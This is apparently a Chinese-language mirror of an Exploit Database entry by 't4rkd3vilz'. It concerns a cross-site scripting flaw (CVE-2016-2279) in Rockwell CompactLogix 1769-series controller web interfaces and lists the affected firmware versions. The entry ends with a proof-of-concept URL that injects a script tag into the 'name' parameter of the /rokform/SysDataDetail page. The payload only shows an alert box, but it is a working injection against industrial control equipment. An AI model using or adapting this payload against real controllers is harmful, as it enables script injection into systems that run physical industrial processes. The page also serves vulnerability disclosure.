Rockwell Scada System 27.011 – Cross-Site Scripting

• Exploit Database
• 22 阅读

• 作者： t4rkd3vilz
  日期： 2018-05-16
• 类别：

  • webapps
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/44626/

• # Exploit Title: Rockwell Scada System - Cross-Site Scripting
  # Date: 2018-05-16
  # Exploit Author: t4rkd3vilz
  # Vendor Homepage: https://rockwellautomation.com/
  # Software Link: http://compatibility.rockwellautomation.com/Pages/MultiProductDownload.aspx?famID=4
  # Version: 1769-L16ER-BB1B, Version 27.011 and earlier, 1769-L18ER-BB1B, Version 27.011 and earlier, 
  # 1769-L18ERM-BB1B, Version 27.011 and earlier, 1769-L24ER-QB1B, 
  # Version 27.011 and earlier, 1769-L24ER-QBFC1B
  # Version 27.011 and earlier, 1769-L27ERM-QBFC1B, Version 27.011 and earlier 
  # 1769-L30ER Version 27.011 and earlier, 1769-L30ERM, Version 27.011 and earlier, 
  # 1769-L30ER-NSE, Version 27.011 and earlier
  # 1769-L33ER Version 27.011 and earlier, 1769-L33ERM, Version 27.011 and earlier, 1769-L36ERM, Version 27.011 and earlier 
  # 1769-L23E-QB1B, Version 20.018 and earlier (Discontinued June 2016), and 1769-L23E-QBFC1B, Version 20.018 and earlier 
  # (Discontinued June 2016).
  # Tested on: Windows Machine and Chrome,Firefox explorer
  # CVE : CVE-2016-2279
  
  # PoC 
  http://TargetIP/rokform/SysDataDetail?name=<<script>alert(1);</script>